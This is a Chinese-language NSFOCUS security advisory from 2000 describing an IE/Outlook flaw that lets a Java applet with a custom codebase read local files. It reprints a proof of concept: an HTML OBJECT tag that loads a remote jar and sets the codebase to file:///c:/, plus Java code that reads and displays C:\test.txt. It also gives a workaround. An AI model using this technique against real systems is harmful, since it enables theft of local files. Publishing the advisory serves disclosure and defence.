首页 -> 安全研究

安全研究

安全漏洞
微软IE/Outlook/Outlook Express以任意Codebase执行Java程序

发布日期:2000-09-19
更新日期:2000-09-19

受影响系统:

Microsoft Internet Explorer 5.5
Microsoft Outlook
Microsoft Outlook Express
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 2000
描述:

通过在Java applet中指定自定义的codebase,并通过HTML邮件或者网站交付给受害者,攻
击者可能获得远程系统的读权限。当使用微软IE或Outlook/Outlook Express时,可在Java
applet中引用任意的codebase,该applet通过<OBJECT>标签和一个jar文件一起被加载。这
使得远程攻击者可能读取任意知名的文件。

<* 来源:Georgi Guninski (guninski@guninski.com) *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Georgi Guninski (guninski@guninski.com) 建立了如下演示页面用来显示C:\和
C:\text.txt的内容:
http://www.guninski.com/javacodebase1.html

该页面的源码如下:

<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>

对应的gjavacodebase.java程序的源码为:

......
  try
   {
      u = new URL(getParameter("URL"));
      InputStream is=u.openStream();
      byte ba[]=new byte[1000];
      int l=is.read(ba);
      InputStream os=u.openConnection().getInputStream();
      String s1=new String(ba,0,l);

      print(u.toString());
      print(s1);
   }
.......


建议:

临时解决办法:

    NSFOCUS建议您暂时禁止浏览器执行HTML中的Java程序。

厂商补丁:

    微软已经得知此事,正在着手提供补丁


浏览次数:6035
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障